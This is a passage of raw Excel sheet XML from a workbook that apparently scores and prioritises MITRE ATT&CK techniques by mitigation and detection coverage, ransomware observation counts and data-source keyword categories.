        <f t="array" ref="AG320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH320" s="37">
        <v>316</v>
      </c>
      <c r="AI320" s="37" t="str" cm="1">
        <f t="array" ref="AI320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD320)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ320" s="37">
        <v>316</v>
      </c>
      <c r="AK320" s="37" t="str" cm="1">
        <f t="array" ref="AK320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL320" s="37">
        <v>316</v>
      </c>
      <c r="AM320" s="37" t="str" cm="1">
        <f t="array" ref="AM320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD320)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN320" s="37">
        <v>0</v>
      </c>
      <c r="AO320" s="37"/>
      <c r="AP320" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ320" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.166666666666664</v>
      </c>
      <c r="AR320" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS320" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT320" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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21" spans="1:47" ht="68">
      <c r="A321" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B321" s="37">
        <f t="shared" si="4"/>
        <v>132.94285714285715</v>
      </c>
      <c r="C321" s="37" t="s">
        <v>1119</v>
      </c>
      <c r="D321" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E321" s="37" t="s">
        <v>1120</v>
      </c>
      <c r="F321" s="37">
        <v>1</v>
      </c>
      <c r="G321" s="37">
        <v>1</v>
      </c>
      <c r="H321" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I321" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J321" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K321" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L321" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M321" s="37">
        <v>0</v>
      </c>
      <c r="N321" s="56">
        <v>0</v>
      </c>
      <c r="O321" s="56">
        <v>1</v>
      </c>
      <c r="P321" s="56">
        <v>0</v>
      </c>
      <c r="Q321" s="56">
        <v>0</v>
      </c>
      <c r="R321" s="57"/>
      <c r="S321" s="57"/>
      <c r="T321" s="57"/>
      <c r="U321" s="57"/>
      <c r="V321" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W321" s="37">
        <v>0</v>
      </c>
      <c r="X321" s="37">
        <v>0</v>
      </c>
      <c r="Y321" s="37">
        <v>0</v>
      </c>
      <c r="Z321" s="37">
        <v>1</v>
      </c>
      <c r="AA321" s="37">
        <v>0.01</v>
      </c>
      <c r="AB321" s="37">
        <v>0.01</v>
      </c>
      <c r="AC321" s="37"/>
      <c r="AD321" s="50" t="s">
        <v>1121</v>
      </c>
      <c r="AE321" s="37" t="str" cm="1">
        <f t="array" ref="AE321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD321)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF321" s="37">
        <v>317</v>
      </c>
      <c r="AG321" s="37" t="str" cm="1">
        <f t="array" ref="AG321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH321" s="37">
        <v>317</v>
      </c>
      <c r="AI321" s="37" t="str" cm="1">
        <f t="array" ref="AI321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD321)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ321" s="37">
        <v>317</v>
      </c>
      <c r="AK321" s="37" t="str" cm="1">
        <f t="array" ref="AK321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL321" s="37">
        <v>317</v>
      </c>
      <c r="AM321" s="37" t="str" cm="1">
        <f t="array" ref="AM321">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD321)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN321" s="37">
        <v>0</v>
      </c>
      <c r="AO321" s="37"/>
      <c r="AP321" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ321" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>44.314285714285717</v>
      </c>
      <c r="AR321" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS321" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT321" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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22" spans="1:47" ht="51">
      <c r="A322" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B322" s="37">
        <f t="shared" si="4"/>
        <v>207.09357980952379</v>
      </c>
      <c r="C322" s="37" t="s">
        <v>1122</v>
      </c>
      <c r="D322" s="50" t="s">
        <v>1123</v>
      </c>
      <c r="E322" s="37"/>
      <c r="F322" s="37">
        <v>1</v>
      </c>
      <c r="G322" s="37">
        <v>1</v>
      </c>
      <c r="H322" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I322" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J322" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K322" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L322" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M322" s="37">
        <v>3.8871999999999997E-2</v>
      </c>
      <c r="N322" s="56">
        <v>0</v>
      </c>
      <c r="O322" s="56">
        <v>2</v>
      </c>
      <c r="P322" s="56">
        <v>3</v>
      </c>
      <c r="Q322" s="56">
        <v>0</v>
      </c>
      <c r="R322" s="57"/>
      <c r="S322" s="57">
        <v>0</v>
      </c>
      <c r="T322" s="57"/>
      <c r="U322" s="57">
        <v>0</v>
      </c>
      <c r="V322" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W322" s="37">
        <v>0</v>
      </c>
      <c r="X322" s="37">
        <v>0</v>
      </c>
      <c r="Y322" s="37">
        <v>0</v>
      </c>
      <c r="Z322" s="37">
        <v>5</v>
      </c>
      <c r="AA322" s="37">
        <v>0.05</v>
      </c>
      <c r="AB322" s="37">
        <v>0.05</v>
      </c>
      <c r="AC322" s="37"/>
      <c r="AD322" s="50" t="s">
        <v>1124</v>
      </c>
      <c r="AE322" s="37" t="str" cm="1">
        <f t="array" ref="AE322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD322)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF322" s="37">
        <v>318</v>
      </c>
      <c r="AG322" s="37" t="str" cm="1">
        <f t="array" ref="AG322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD322)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH322" s="37">
        <v>318</v>
      </c>
      <c r="AI322" s="37" t="str" cm="1">
        <f t="array" ref="AI322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ322" s="37">
        <v>318</v>
      </c>
      <c r="AK322" s="37" t="str" cm="1">
        <f t="array" ref="AK322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL322" s="37">
        <v>318</v>
      </c>
      <c r="AM322" s="37" t="str" cm="1">
        <f t="array" ref="AM322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN322" s="37">
        <v>0</v>
      </c>
      <c r="AO322" s="37">
        <v>3</v>
      </c>
      <c r="AP322" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ322" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>69.031193269841268</v>
      </c>
      <c r="AR322" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS322" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT322" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU32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5.002228090702947</v>
      </c>
    </row>
    <row r="323" spans="1:47" ht="51">
      <c r="A323" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B323" s="37">
        <f t="shared" si="4"/>
        <v>170.26666666666665</v>
      </c>
      <c r="C323" s="37" t="s">
        <v>1125</v>
      </c>
      <c r="D323" s="50" t="s">
        <v>1123</v>
      </c>
      <c r="E323" s="37" t="s">
        <v>1126</v>
      </c>
      <c r="F323" s="37">
        <v>1</v>
      </c>
      <c r="G323" s="37">
        <v>1</v>
      </c>
      <c r="H323" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I323" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J323" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K323" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L323" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M323" s="37">
        <v>0</v>
      </c>
      <c r="N323" s="56">
        <v>1</v>
      </c>
      <c r="O323" s="56">
        <v>4</v>
      </c>
      <c r="P323" s="56">
        <v>2</v>
      </c>
      <c r="Q323" s="56">
        <v>0</v>
      </c>
      <c r="R323" s="57"/>
      <c r="S323" s="57">
        <v>0</v>
      </c>
      <c r="T323" s="57"/>
      <c r="U323" s="57">
        <v>0</v>
      </c>
      <c r="V323" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W323" s="37">
        <v>0</v>
      </c>
      <c r="X323" s="37">
        <v>0</v>
      </c>
      <c r="Y323" s="37">
        <v>0</v>
      </c>
      <c r="Z323" s="37">
        <v>7</v>
      </c>
      <c r="AA323" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB323" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC323" s="37"/>
      <c r="AD323" s="50" t="s">
        <v>1124</v>
      </c>
      <c r="AE323" s="37" t="str" cm="1">
        <f t="array" ref="AE323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD323)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF323" s="37">
        <v>319</v>
      </c>
      <c r="AG323" s="37" t="str" cm="1">
        <f t="array" ref="AG323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD323)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH323" s="37">
        <v>319</v>
      </c>
      <c r="AI323" s="37" t="str" cm="1">
        <f t="array" ref="AI323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ323" s="37">
        <v>319</v>
      </c>
      <c r="AK323" s="37" t="str" cm="1">
        <f t="array" ref="AK323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL323" s="37">
        <v>319</v>
      </c>
      <c r="AM323" s="37" t="str" cm="1">
        <f t="array" ref="AM323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN323" s="37">
        <v>0</v>
      </c>
      <c r="AO323" s="37">
        <v>2</v>
      </c>
      <c r="AP323" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ323" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>56.755555555555553</v>
      </c>
      <c r="AR323" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS323" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT323" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU32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2.75026455026455</v>
      </c>
    </row>
    <row r="324" spans="1:47" ht="34">
      <c r="A324" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B324" s="37">
        <f t="shared" si="4"/>
        <v>439.36238200000003</v>
      </c>
      <c r="C324" s="37" t="s">
        <v>1127</v>
      </c>
      <c r="D324" s="50" t="s">
        <v>1128</v>
      </c>
      <c r="E324" s="37"/>
      <c r="F324" s="37">
        <v>1</v>
      </c>
      <c r="G324" s="37">
        <v>1</v>
      </c>
      <c r="H324" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I324" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J324" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K324" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L324" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M324" s="37">
        <v>1.27E-4</v>
      </c>
      <c r="N324" s="56">
        <v>0</v>
      </c>
      <c r="O324" s="56">
        <v>1</v>
      </c>
      <c r="P324" s="56">
        <v>0</v>
      </c>
      <c r="Q324" s="56">
        <v>0</v>
      </c>
      <c r="R324" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S324" s="57">
        <v>9</v>
      </c>
      <c r="T324" s="57" t="s">
        <v>1129</v>
      </c>
      <c r="U324" s="57">
        <v>16</v>
      </c>
      <c r="V324" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24285690476190477</v>
      </c>
      <c r="W324" s="37">
        <v>25</v>
      </c>
      <c r="X324" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y324" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z324" s="37">
        <v>1</v>
      </c>
      <c r="AA324" s="37">
        <v>0.01</v>
      </c>
      <c r="AB324" s="37">
        <v>0.01</v>
      </c>
      <c r="AC324" s="37"/>
      <c r="AD324" s="50" t="s">
        <v>1130</v>
      </c>
      <c r="AE324" s="37" t="str" cm="1">
        <f t="array" ref="AE324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF324" s="37">
        <v>320</v>
      </c>
      <c r="AG324" s="37" t="str" cm="1">
        <f t="array" ref="AG324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH324" s="37">
        <v>320</v>
      </c>
      <c r="AI324" s="37" t="str" cm="1">
        <f t="array" ref="AI324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ324" s="37">
        <v>320</v>
      </c>
      <c r="AK324" s="37" t="str" cm="1">
        <f t="array" ref="AK324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD324)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL324" s="37">
        <v>320</v>
      </c>
      <c r="AM324" s="37" t="str" cm="1">
        <f t="array" ref="AM324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN324" s="37">
        <v>0</v>
      </c>
      <c r="AO324" s="37">
        <v>0</v>
      </c>
      <c r="AP324" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ324" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>146.45412733333333</v>
      </c>
      <c r="AR324" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS324" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT324" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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25" spans="1:47" ht="17">
      <c r="A325" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B325" s="37">
        <f t="shared" ref="B325:B388" si="5">SUM(H325,M325,V325)*(1+SUM(AF325,AH325,AJ325,AL325,AN325))</f>
        <v>189.6904761904762</v>
      </c>
      <c r="C325" s="37" t="s">
        <v>1131</v>
      </c>
      <c r="D325" s="50" t="s">
        <v>1132</v>
      </c>
      <c r="E325" s="37"/>
      <c r="F325" s="37">
        <v>1</v>
      </c>
      <c r="G325" s="37">
        <v>1</v>
      </c>
      <c r="H325" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I325" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J325" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K325" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L325" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M325" s="37">
        <v>0</v>
      </c>
      <c r="N325" s="56">
        <v>0</v>
      </c>
      <c r="O325" s="56">
        <v>2</v>
      </c>
      <c r="P325" s="56">
        <v>1</v>
      </c>
      <c r="Q325" s="56">
        <v>7</v>
      </c>
      <c r="R325" s="57"/>
      <c r="S325" s="57">
        <v>0</v>
      </c>
      <c r="T325" s="57"/>
      <c r="U325" s="57">
        <v>0</v>
      </c>
      <c r="V325" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W325" s="37">
        <v>0</v>
      </c>
      <c r="X325" s="37">
        <v>0</v>
      </c>
      <c r="Y325" s="37">
        <v>0</v>
      </c>
      <c r="Z325" s="37">
        <v>10</v>
      </c>
      <c r="AA325" s="37">
        <v>0.1</v>
      </c>
      <c r="AB325" s="37">
        <v>0.1</v>
      </c>
      <c r="AC325" s="37"/>
      <c r="AD325" s="50" t="s">
        <v>1133</v>
      </c>
      <c r="AE325" s="37" t="str" cm="1">
        <f t="array" ref="AE325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD325)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF325" s="37">
        <v>321</v>
      </c>
      <c r="AG325" s="37" t="str" cm="1">
        <f t="array" ref="AG325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH325" s="37">
        <v>321</v>
      </c>
      <c r="AI325" s="37" t="str" cm="1">
        <f t="array" ref="AI325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ325" s="37">
        <v>321</v>
      </c>
      <c r="AK325" s="37" t="str" cm="1">
        <f t="array" ref="AK325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD325)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL325" s="37">
        <v>321</v>
      </c>
      <c r="AM325" s="37" t="str" cm="1">
        <f t="array" ref="AM325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN325" s="37">
        <v>0</v>
      </c>
      <c r="AO325" s="37">
        <v>0</v>
      </c>
      <c r="AP325" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ325" s="37">
